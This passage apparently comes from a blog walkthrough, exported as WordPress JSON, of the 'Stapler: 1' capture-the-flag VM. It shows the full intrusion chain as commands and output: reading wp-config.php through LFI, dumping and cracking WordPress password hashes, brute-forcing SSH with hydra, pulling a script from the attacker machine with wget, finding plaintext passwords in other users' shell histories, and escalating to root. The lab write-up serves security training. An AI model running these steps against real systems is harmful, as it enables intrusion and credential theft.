Table Prefix,\n * Secret Keys, and ABSPATH. You can find more information by visiting\n * {@link https:\/\/codex.wordpress.org\/Editing_wp-config.php Editing wp-config.php}\n * Codex page. You can get the MySQL settings from your web host.\n *\n * This file is used by the wp-config.php creation script during the\n * installation. 
You don&#039;t have to use the web site, you can just copy this file\n * to &quot;wp-config.php&quot; and fill in the values.\n *\n * @package WordPress\n *\/\n\n\/\/ ** MySQL settings - You can get this info from your web host ** \/\/\n\/** The name of the database for WordPress *\/\ndefine(&#039;DB_NAME&#039;, &#039;wordpress&#039;);\n\n\/** MySQL database username *\/\ndefine(&#039;DB_USER&#039;, &#039;root&#039;);\n\n\/** MySQL database password *\/\ndefine(&#039;DB_PASSWORD&#039;, &#039;plbkac&#039;);\n\n\/** MySQL hostname *\/\ndefine(&#039;DB_HOST&#039;, &#039;localhost&#039;);\n\n\/** Database Charset to use in creating database tables. *\/\ndefine(&#039;DB_CHARSET&#039;, &#039;utf8mb4&#039;);\n\n\/** The Database Collate type. Don&#039;t change this if in doubt. *\/\ndefine(&#039;DB_COLLATE&#039;, &#039;&#039;);\n\n\/**#@+\n * Authentication Unique Keys and Salts.\n *\n * Change these to different unique phrases!\n * You can generate these using the {@link https:\/\/api.wordpress.org\/secret-key\/1.1\/salt\/ WordPress.org secret-key service}\n * You can change these at any point in time to invalidate all existing cookies. 
This will force all users to have to log in again.\n *\n * @since 2.6.0\n *\/\ndefine(&#039;AUTH_KEY&#039;,         &#039;V 5p=[.Vds8~SX;&gt;t)++Tt57U6{Xe`T|oW^eQ!mHr }]&gt;9RX07W&lt;sZ,I~`6Y5-T:&#039;);\ndefine(&#039;SECURE_AUTH_KEY&#039;,  &#039;vJZq=p.Ug,]:&lt;-P#A|k-+:;JzV8*pZ|K\/U*J][Nyvs+}&amp;!\/#&gt;4#K7eFP5-av`n)2&#039;);\ndefine(&#039;LOGGED_IN_KEY&#039;,    &#039;ql-Vfg[?v6{ZR*+O)|Hf OpPWYfKX0Jmpl8zU&lt;cr.wm?|jqZH:YMv;zu@tM7P:4o&#039;);\ndefine(&#039;NONCE_KEY&#039;,        &#039;j|V8J.~n}R2,mlU%?C8o2[~6Vo1{Gt+4mykbYH;HDAIj9TE?QQI!VW]]D`3i73xO&#039;);\ndefine(&#039;AUTH_SALT&#039;,        &#039;I{gDlDs`Z@.+\/AdyzYw4%+&lt;WsO-LDBHT}&gt;}!||Xrf@1E6jJNV={p1?yMKYec*OI$&#039;);\ndefine(&#039;SECURE_AUTH_SALT&#039;, &#039;.HJmx^zb];5P}hM-uJ%^+9=0SBQEh[[*&gt;#z+p&gt;nVi10`XOUq (Zml~op3SG4OG_D&#039;);\ndefine(&#039;LOGGED_IN_SALT&#039;,   &#039;[Zz!)%R7\/w37+:9L#.=hL:cyeMM2kTx&amp;_nP4{D}n=y=FQt%zJw&gt;c[a+;ppCzIkt;&#039;);\ndefine(&#039;NONCE_SALT&#039;,       &#039;tb(}BfgB7l!rhDVm{eK6^MSN-|o]S]]axl4TE_y+Fi5I-RxN\/9xeTsK]#ga_9:hJ&#039;);\n\n\/**#@-*\/\n\n\/**\n * WordPress Database Table prefix.\n *\n * You can have multiple installations in one database if you give each a unique\n * prefix. Only numbers, letters, and underscores please!\n *\/\n$table_prefix  = &#039;wp_&#039;;\n\n\/**\n * For developers: WordPress debugging mode.\n *\n * Change this to true to enable the display of notices during development.\n * It is strongly recommended that plugin and theme developers use WP_DEBUG\n * in their development environments.\n *\/\ndefine(&#039;WP_DEBUG&#039;, false);\n\n\/* That&#039;s all, stop editing! Happy blogging. *\/\n\n\/** Absolute path to the WordPress directory. *\/\nif ( !defined(&#039;ABSPATH&#039;) )\n    define(&#039;ABSPATH&#039;, dirname(__FILE__) . &#039;\/&#039;);\n\n\/** Sets up WordPress vars and included files. *\/\nrequire_once(ABSPATH . 
&#039;wp-settings.php&#039;);\n\ndefine(&#039;WP_HTTP_BLOCK_EXTERNAL&#039;, true);<\/code><\/pre>\n<p>Using the LFI, we obtained the contents of the wp-config.php file. The MySQL service was open in the nmap output, so let's connect to it now.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali]\n\u2514\u2500# mysql -u root -h 192.168.0.25 -p \nEnter password: \nWelcome to the MariaDB monitor.  Commands end with ; or \\g.\nYour MySQL connection id is 6\nServer version: 5.7.12-0ubuntu1 (Ubuntu)\n\nCopyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.\n\nType &#039;help;&#039; or &#039;\\h&#039; for help. Type &#039;\\c&#039; to clear the current input statement.\n\nMySQL [(none)]&gt; show databases;\n+--------------------+\n| Database           |\n+--------------------+\n| information_schema |\n| loot               |\n| mysql              |\n| performance_schema |\n| phpmyadmin         |\n| proof              |\n| sys                |\n| wordpress          |\n+--------------------+\n8 rows in set (0.007 sec)\n\nMySQL [(none)]&gt; use wordpress;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\n\nDatabase changed\nMySQL [wordpress]&gt; show tables;\n+-----------------------+\n| Tables_in_wordpress   |\n+-----------------------+\n| wp_commentmeta        |\n| wp_comments           |\n| wp_links              |\n| wp_options            |\n| wp_postmeta           |\n| wp_posts              |\n| wp_term_relationships |\n| wp_term_taxonomy      |\n| wp_terms              |\n| wp_usermeta           |\n| wp_users              |\n+-----------------------+\n11 rows in set (0.002 sec)\n\nMySQL [wordpress]&gt; select * from ep_users;\nERROR 1146 (42S02): Table &#039;wordpress.ep_users&#039; doesn&#039;t exist\nMySQL [wordpress]&gt; select * from 
wp_users;\n+----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+\n| ID | user_login | user_pass                          | user_nicename | user_email            | user_url         | user_registered     | user_activation_key | user_status | display_name    |\n+----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+\n|  1 | John       | $P$B7889EMq\/erHIuZapMB8GEizebcIy9. | john          | john@red.localhost    | http:\/\/localhost | 2016-06-03 23:18:47 |                     |           0 | John Smith      |\n|  2 | Elly       | $P$BlumbJRRBit7y50Y17.UPJ\/xEgv4my0 | elly          | Elly@red.localhost    |                  | 2016-06-05 16:11:33 |                     |           0 | Elly Jones      |\n|  3 | Peter      | $P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0 | peter         | peter@red.localhost   |                  | 2016-06-05 16:13:16 |                     |           0 | Peter Parker    |\n|  4 | barry      | $P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0 | barry         | barry@red.localhost   |                  | 2016-06-05 16:14:26 |                     |           0 | Barry Atkins    |\n|  5 | heather    | $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 | heather       | heather@red.localhost |                  | 2016-06-05 16:18:04 |                     |           0 | Heather Neville |\n|  6 | garry      | $P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1 | garry         | garry@red.localhost   |                  | 2016-06-05 16:18:23 |                     |           0 | garry           |\n|  7 | harry      | $P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0 | harry         | harry@red.localhost   |                  | 2016-06-05 16:18:41 |                     |           0 | harry           |\n|  8 | scott      | $P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1 
| scott         | scott@red.localhost   |                  | 2016-06-05 16:18:59 |                     |           0 | scott           |\n|  9 | kathy      | $P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0 | kathy         | kathy@red.localhost   |                  | 2016-06-05 16:19:14 |                     |           0 | kathy           |\n| 10 | tim        | $P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0 | tim           | tim@red.localhost     |                  | 2016-06-05 16:19:29 |                     |           0 | tim             |\n| 11 | ZOE        | $P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1 | zoe           | zoe@red.localhost     |                  | 2016-06-05 16:19:50 |                     |           0 | ZOE             |\n| 12 | Dave       | $P$Bl7\/V9Lqvu37jJT.6t4KWmY.v907Hy. | dave          | dave@red.localhost    |                  | 2016-06-05 16:20:09 |                     |           0 | Dave            |\n| 13 | Simon      | $P$BLxdiNNRP008kOQ.jE44CjSK\/7tEcz0 | simon         | simon@red.localhost   |                  | 2016-06-05 16:20:35 |                     |           0 | Simon           |\n| 14 | Abby       | $P$ByZg5mTBpKiLZ5KxhhRe\/uqR.48ofs. 
| abby          | abby@red.localhost    |                  | 2016-06-05 16:20:53 |                     |           0 | Abby            |\n| 15 | Vicki      | $P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131 | vicki         | vicki@red.localhost   |                  | 2016-06-05 16:21:14 |                     |           0 | Vicki           |\n| 16 | Pam        | $P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0 | pam           | pam@red.localhost     |                  | 2016-06-05 16:42:23 |                     |           0 | Pam             |\n+----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+\n16 rows in set (0.002 sec)\n\nMySQL [wordpress]&gt; select concat_ws(\u2018:\u2019, user_login, user_pass) from wp_users;\nERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#039;:\u2019, user_login, user_pass) from wp_users&#039; at line 1\nMySQL [wordpress]&gt; select concat_ws(&#039;:&#039;, user_login, user_pass) from wp_users;\n+--------------------------------------------+\n| concat_ws(&#039;:&#039;, user_login, user_pass)      |\n+--------------------------------------------+\n| John:$P$B7889EMq\/erHIuZapMB8GEizebcIy9.    |\n| Elly:$P$BlumbJRRBit7y50Y17.UPJ\/xEgv4my0    |\n| Peter:$P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0   |\n| barry:$P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0   |\n| heather:$P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 |\n| garry:$P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1   |\n| harry:$P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0   |\n| scott:$P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1   |\n| kathy:$P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0   |\n| tim:$P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0     |\n| ZOE:$P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1     |\n| Dave:$P$Bl7\/V9Lqvu37jJT.6t4KWmY.v907Hy.    |\n| Simon:$P$BLxdiNNRP008kOQ.jE44CjSK\/7tEcz0   |\n| Abby:$P$ByZg5mTBpKiLZ5KxhhRe\/uqR.48ofs.    
|\n| Vicki:$P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131   |\n| Pam:$P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0     |\n+--------------------------------------------+\n16 rows in set (0.002 sec)\n<\/code><\/pre>\n<p>I built a users file from the users found here and the ones I obtained through smb. I then used john to crack the hashes, which are in <strong>phpass<\/strong> format.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# john hash --wordlist=\/usr\/share\/wordlists\/rockyou.txt --rules --format=phpass\nUsing default input encoding: UTF-8\nLoaded 16 password hashes with 16 different salts (phpass [phpass ($P$ or $H$) 128\/128 AVX 4x3])\nCost 1 (iteration count) is 8192 for all loaded hashes\nWill run 4 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\ncookie           (scott)\nmonkey           (harry)\nfootball         (garry)\ncoolgirl         (kathy)\nwashere          (barry)\nincorrect        (John)\nthumb            (tim)\n0520             (Pam)\npassphrase       (heather)\ndamachine        (Dave)\nylle             (Elly)\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# cat users \nelly\nNATHAN\nzoe\nkai\nmel\nTaylor\nSHAY\njess\nDrew\nSam\njamie\nJLipps\nLSolum2\nEeth\nCJoo\nJKanode\nCCeaser\nSStroud\nMFrei\nIChadwick\nJBare\nMBassin\nSHayslett\nAParnell\nDSwanger\nETollefson\nRNunemaker\npeter\nroot\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# cat pass \ncookie\nmonkey\nfootball\ncoolgirl\nwashere\nincorrect\nthumb\n0520\nplbkac\n<\/code><\/pre>\n<p>We know the ssh service is open, so I started an attack with hydra using the information we have.<\/p>\n<pre><code 
class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# hydra -L users -P pass  ssh:\/\/192.168.0.25 -e nsr &gt;&gt; hydra_result\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# cat hydra_result\nHydra v9.1 (c) 2020 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2021-05-30 14:56:40\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 348 login tries (l:29\/p:12), ~22 tries per task\n[DATA] attacking ssh:\/\/192.168.0.25:22\/\n[22][ssh] host: 192.168.0.25   login: zoe   password: plbkac\n[22][ssh] host: 192.168.0.25   login: zoe   password: plbkac\n[STATUS] 115.00 tries\/min, 115 tries in 00:01h, 235 to do in 00:03h, 16 active\n[22][ssh] host: 192.168.0.25   login: JBare   password: cookie\n[22][ssh] host: 192.168.0.25   login: SHayslett   password: SHayslett\n1 of 1 target successfully completed, 4 valid passwords found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2021-05-30 14:59:35\n<\/code><\/pre>\n<p>Great, now we can connect over ssh.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# ssh JBare@192.168.0.25                                                                                                                                                                                                             255 \u2a2f\n-----------------------------------------------------------------\n~          Barry, don&#039;t forget to put a message here           ~\n-----------------------------------------------------------------\nJBare@192.168.0.25&#039;s password: \nWelcome back!\n\nJBare@red:~$ whoami\nJBare\nJBare@red:~$ cd 
\/tmp\/\n<\/code><\/pre>\n<p>From this point on I will enumerate the machine with the <a href=\"https:\/\/github.com\/kudayDOTsite\/linux-smart-enumeration\">https:\/\/github.com\/kudayDOTsite\/linux-smart-enumeration<\/a> project. I copied the relevant sh file to the target machine.<\/p>\n<pre><code class=\"language-sh\">JBare@red:\/tmp$ wget http:\/\/192.168.0.21:1822\/lse.sh\n--2021-05-30 23:03:57--  http:\/\/192.168.0.21:1822\/lse.sh\nConnecting to 192.168.0.21:1822... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 41177 (40K) [text\/x-sh]\nSaving to: \u2018lse.sh\u2019\n\nlse.sh                                                      100%[========================================================================================================================================&gt;]  40.21K  --.-KB\/s    in 0s      \n\n2021-05-30 23:03:57 (199 MB\/s) - \u2018lse.sh\u2019 saved [41177\/41177]\n\nJBare@red:\/tmp$ chmod 777 lse.sh<\/code><\/pre>\n<p>And I ran it.<\/p>\n<pre><code class=\"language-sh\">JBare@red:\/tmp$ .\/lse.sh -l2  &gt;&gt; result.txt\nIf you know the current user password, write it here to check sudo privileges: cookie<\/code><\/pre>\n<p>The output shown here is only a small part of the results:<\/p>\n<pre><code class=\"language-sh\">[!] fst050 Uncommon setgid binaries........................................ skip\n[!] fst060 Can we write to any setgid binary?.............................. skip\n[*] fst070 Can we read \/root?.............................................. nope\n[*] fst080 Can we read subdirectories under \/home?......................... 
yes!\n---\ntotal 24\ndrwxr-xr-x  2 AParnell AParnell 4096 Jun  5  2016 .\ndrwxr-xr-x 32 root     root     4096 Jun  4  2016 ..\n-rw-r--r--  1 root     root        5 Jun  5  2016 .bash_history\n-rw-r--r--  1 AParnell AParnell  220 Sep  1  2015 .bash_logout\n-rw-r--r--  1 AParnell AParnell 3771 Sep  1  2015 .bashrc\n-rw-r--r--  1 AParnell AParnell  675 Sep  1  2015 .profile\ntotal 24\ndrwxr-xr-x  2 CCeaser CCeaser 4096 Jun  5  2016 .\ndrwxr-xr-x 32 root    root    4096 Jun  4  2016 ..\n-rw-r--r--  1 root    root      10 Jun  5  2016 .bash_history\n-rw-r--r--  1 CCeaser CCeaser  220 Sep  1  2015 .bash_logout\n-rw-r--r--  1 CCeaser CCeaser 3771 Sep  1  2015 .bashrc\n-rw-r--r--  1 CCeaser CCeaser  675 Sep  1  2015 .profile\ntotal 24\ndrwxr-xr-x  2 CJoo CJoo 4096 Jun  5  2016 .\ndrwxr-xr-x 32 root root 4096 Jun  4  2016 ..\n-rw-r--r--  1 root root    5 Jun  5  2016 .bash_history\n-rw-r--r--  1 CJoo CJoo  220 Sep  1  2015 .bash_logout\n-rw-r--r--  1 CJoo CJoo 3771 Sep  1  2015 .bashrc\n-rw-r--r--  1 CJoo CJoo  675 Sep  1  2015 .profile\ntotal 24\ndrwxr-xr-x  2 DSwanger DSwanger 4096 Jun  5  2016 .\ndrwxr-xr-x 32 root     root     4096 Jun  4  2016 ..\n-rw-r--r--  1 root     root        5 Jun  5  2016 .bash_history\n-rw-r--r--  1 DSwanger DSwanger  220 Sep  1  2015 .bash_logout\n-rw-r--r--  1 DSwanger DSwanger 3771 Sep  1  2015 .bashrc\n-rw-r--r--  1 DSwanger DSwanger  675 Sep  1  2015 .profile<\/code><\/pre>\n<p>Every user's home directory contains a .bash_history that we can read, and these files are owned by root. 
So I did the following.<\/p>\n<pre><code class=\"language-sh\">JBare@red:\/home$ ls -l\ntotal 120\ndrwxr-xr-x 2 AParnell   AParnell   4096 Jun  5  2016 AParnell\ndrwxr-xr-x 2 CCeaser    CCeaser    4096 Jun  5  2016 CCeaser\ndrwxr-xr-x 2 CJoo       CJoo       4096 Jun  5  2016 CJoo\ndrwxr-xr-x 2 Drew       Drew       4096 Jun  5  2016 Drew\ndrwxr-xr-x 2 DSwanger   DSwanger   4096 Jun  5  2016 DSwanger\ndrwxr-xr-x 2 Eeth       Eeth       4096 Jun  5  2016 Eeth\ndrwxr-xr-x 2 elly       elly       4096 Jun  5  2016 elly\ndrwxr-xr-x 2 ETollefson ETollefson 4096 Jun  5  2016 ETollefson\ndrwxr-xr-x 2 IChadwick  IChadwick  4096 Jun  5  2016 IChadwick\ndrwxr-xr-x 2 jamie      jamie      4096 Jun  5  2016 jamie\ndrwxr-xr-x 3 JBare      JBare      4096 May 30 22:24 JBare\ndrwxr-xr-x 2 jess       jess       4096 Jun  5  2016 jess\ndrwxr-xr-x 2 JKanode    JKanode    4096 Jun  5  2016 JKanode\ndrwxr-xr-x 2 JLipps     JLipps     4096 Jun  5  2016 JLipps\ndrwxr-xr-x 2 kai        kai        4096 Jun  5  2016 kai\ndrwxr-xr-x 2 LSolum     LSolum     4096 Jun  5  2016 LSolum\ndrwxr-xr-x 2 LSolum2    LSolum2    4096 Jun  5  2016 LSolum2\ndrwxr-xr-x 2 MBassin    MBassin    4096 Jun  5  2016 MBassin\ndrwxr-xr-x 2 mel        mel        4096 Jun  5  2016 mel\ndrwxr-xr-x 2 MFrei      MFrei      4096 Jun  5  2016 MFrei\ndrwxr-xr-x 2 NATHAN     NATHAN     4096 Jun  5  2016 NATHAN\ndrwxr-xr-x 3 peter      peter      4096 Jun  3  2016 peter\ndrwxr-xr-x 2 RNunemaker RNunemaker 4096 Jun  5  2016 RNunemaker\ndrwxr-xr-x 2 Sam        Sam        4096 Jun  5  2016 Sam\ndrwxr-xr-x 2 SHAY       SHAY       4096 Jun  5  2016 SHAY\ndrwxr-xr-x 3 SHayslett  SHayslett  4096 May 30 22:24 SHayslett\ndrwxr-xr-x 2 SStroud    SStroud    4096 Jun  5  2016 SStroud\ndrwxr-xr-x 2 Taylor     Taylor     4096 Jun  5  2016 Taylor\ndrwxrwxrwx 2 www        www        4096 Jun  5  2016 www\ndrwxr-xr-x 3 zoe        zoe        4096 May 30 22:57 zoe\nJBare@red:\/home$ 
cat AParnell\/.bash\ncat: AParnell\/.bash: No such file or directory\nJBare@red:\/home$ cat AParnell\/.bash_history \nexit\nJBare@red:\/home$ cat CCeaser\/.bash_history \nfree\nexit\nJBare@red:\/home$ cat CJoo\/.bash_history \nexit\nJBare@red:\/home$ cat Drew\/.bash_history \nexit\nJBare@red:\/home$ cat DSwanger\/.bash_history \nexit\nJBare@red:\/home$ cat Eeth\/.bash_history \nexit\nJBare@red:\/home$ cat elly\/.bash_history \nexit\nJBare@red:\/home$ cat ETollefson\/.bash_history \nexit\nJBare@red:\/home$ cat IChadwick\/.bash_history \nexit\nJBare@red:\/home$ cat jamie\/.bash_history \ntop\nps aux\nexit\nJBare@red:\/home$ cat JBare\/.bash_history \nexit\nJBare@red:\/home$ cat jess\/.bash_history \nexit\nJBare@red:\/home$ cat JKanode\/.bash_history \nid\nwhoami\nls -lah\npwd\nps aux\nsshpass -p thisimypassword ssh JKanode@localhost\napt-get install sshpass\nsshpass -p JZQuyIN5 peter@localhost\nps -ef\ntop\nkill -9 3747\nexit\nJBare@red:\/home$ <\/code><\/pre>\n<p>This is great, because when I ran the lse.sh script it had also given me this information.<\/p>\n<pre><code class=\"language-sh\">[*] usr020 Are there other users in an administrative groups?.............. yes!\n---\nsudo:x:27:peter\n---\n[*] usr030 Other users with shell.......................................... yes!\n---\n<\/code><\/pre>\n<p>The peter user is a member of the sudo group! So I switched to the peter user.<\/p>\n<pre><code class=\"language-sh\">JBare@red:\/home$ su peter\nPassword: \n\nThis is the Z Shell configuration function for new users,\nzsh-newuser-install.\nYou are seeing this message because you have no zsh startup files\n(the files .zshenv, .zprofile, .zshrc, .zlogin in the directory\n~).  This function can help you with a few settings that should\nmake your use of the shell easier.\n\nYou can:\n\n(q)  Quit and do nothing.  
The function will be run again next time.\n\n(0)  Exit, creating the file ~\/.zshrc containing just a comment.\n     That will prevent this function being run again.\n\n(1)  Continue to the main menu.\n\n(2)  Populate your ~\/.zshrc with the configuration recommended\n     by the system administrator and exit (you will need to edit\n     the file by hand, if so desired).\n\n--- Type one of the keys in parentheses --- \n\nAborting.\nThe function will be run again next time.  To prevent this, execute:\n  touch ~\/.zshrc\nred% ls\nAParnell  CCeaser  CJoo  Drew  DSwanger  Eeth  elly  ETollefson  IChadwick  jamie  JBare  jess  JKanode  JLipps  kai  LSolum  LSolum2  MBassin  mel  MFrei  NATHAN  peter  RNunemaker  Sam  SHAY  SHayslett  SStroud  Taylor  www  zoe\nred% whoami\npeter\nred% <\/code><\/pre>\n<p>Okay! Let's finish the job.<\/p>\n<pre><code class=\"language-sh\">red% whoami\npeter\nred% id\nuid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)\nred% sudo su\n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n    #1) Respect the privacy of others.\n    #2) Think before you type.\n    #3) With great power comes great responsibility.\n\n[sudo] password for peter: \nSorry, try again.\n[sudo] password for peter: \n\u279c  \/home whoami\nroot\n\u279c  \/home cd \/root \n\u279c  ~ ls\nfix-wordpress.sh  flag.txt  issue  python.sh  wordpress.sql\n\u279c  ~ cat flag.txt \n~~~~~~~~~~&lt;(Congratulations)&gt;~~~~~~~~~~\n                          .-&#039;&#039;&#039;&#039;&#039;-.\n                          |&#039;-----&#039;|\n                          |-.....-|\n                          |       |\n                          |       |\n         _,._             |       |\n    __.o`   o`&quot;-.         
|       |\n .-O o `&quot;-.o   O )_,._    |       |\n( o   O  o )--.-&quot;`O   o&quot;-.`&#039;-----&#039;`\n &#039;--------&#039;  (   o  O    o)  \n              `----------`\nb6b545dc11b7a270f4bad23432190c75162c4a2b<\/code><\/pre>\n<p><strong>Note:<\/strong><br \/>\nWhile solving the machine I tried privilege escalation exploits based on the output below, but got nowhere, even though the versions were a very good match...<\/p>\n<pre><code class=\"language-sh\">\u279c  ~ uname -a\nLinux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU\/Linux\n\u279c  ~ lsb_release -a\nNo LSB modules are available.\nDistributor ID: Ubuntu\nDescription:    Ubuntu 16.04 LTS\nRelease:    16.04\nCodename:   xenial<\/code><\/pre>\n<pre><code class=\"language-sh\">\u2514\u2500# searchsploit ubuntu linux kernel Local Privilege 4.4\n----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\n Exploit Title                                                                                                                                                                                             |  Path\n----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nLinux Kernel 4.4 (Ubuntu 16.04) - &#039;BPF&#039; Local Privilege Escalation (Metasploit)                                                                                                                            | linux\/local\/40759.rb\nLinux Kernel 4.4.0 (Ubuntu 14.04\/16.04 x86-64) - &#039;AF_PACKET&#039; Race Condition Privilege Escalation                                           
                                                                | linux_x86-64\/local\/40871.c\nLinux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation                                                                                                                                        | linux\/local\/41458.c\nLinux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter &#039;target_offset&#039; Out-of-Bounds Privilege Escalation                                                                                                    | linux_x86-64\/local\/40049.c\nLinux Kernel 4.4.0-21 &lt; 4.4.0-51 (Ubuntu 14.04\/16.04 x64) - &#039;AF_PACKET&#039; Race Condition Privilege Escalation                                                                                                | windows_x86-64\/local\/47170.c\nLinux Kernel 4.4.x (Ubuntu 16.04) - &#039;double-fdput()&#039; bpf(BPF_PROG_LOAD) Privilege Escalation                                                                                                               | linux\/local\/39772.txt\nLinux Kernel &lt; 4.13.9 (Ubuntu 16.04 \/ Fedora 27) - Local Privilege Escalation                                                                                                                              | linux\/local\/45010.c\nLinux Kernel &lt; 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation                                                                                                                                     | linux\/local\/44298.c\nLinux Kernel &lt; 4.4.0-21 (Ubuntu 16.04 x64) - &#039;netfilter target_offset&#039; Local Privilege Escalation                                                                                                          | linux_x86-64\/local\/44300.c\nLinux Kernel &lt; 4.4.0-83 \/ &lt; 4.8.0-58 (Ubuntu 14.04\/16.04) - Local Privilege Escalation (KASLR \/ SMEP)                                                                                                      | 
linux\/local\/43418.c\nLinux Kernel &lt; 4.4.0\/ &lt; 4.8.0 (Ubuntu 14.04\/16.04 \/ Linux Mint 17\/18 \/ Zorin) - Local Privilege Escalation (KASLR \/ SMEP)                                                                                  | linux\/local\/47169.c\n----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nShellcodes: No Results\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Machine Information Description: Average beginner\/intermediate VM, only a few twists May find it easy\/hard (depends on YOUR background) &#8230;also which way you attack the&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/05\/30\/stapler-1\/\">Continue reading<span class=\"screen-reader-text\">STAPLER: 1<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[508,507],"class_list":["post-1150","post","type-post","status-publish","format-standard","hentry","category-walkthrough","tag-nikto","tag-wpscan","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1150","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1150"}],"version-history":[{"count":3,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1150\/revision
s"}],"predecessor-version":[{"id":1154,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1150\/revisions\/1154"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1150"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1150"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1150"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}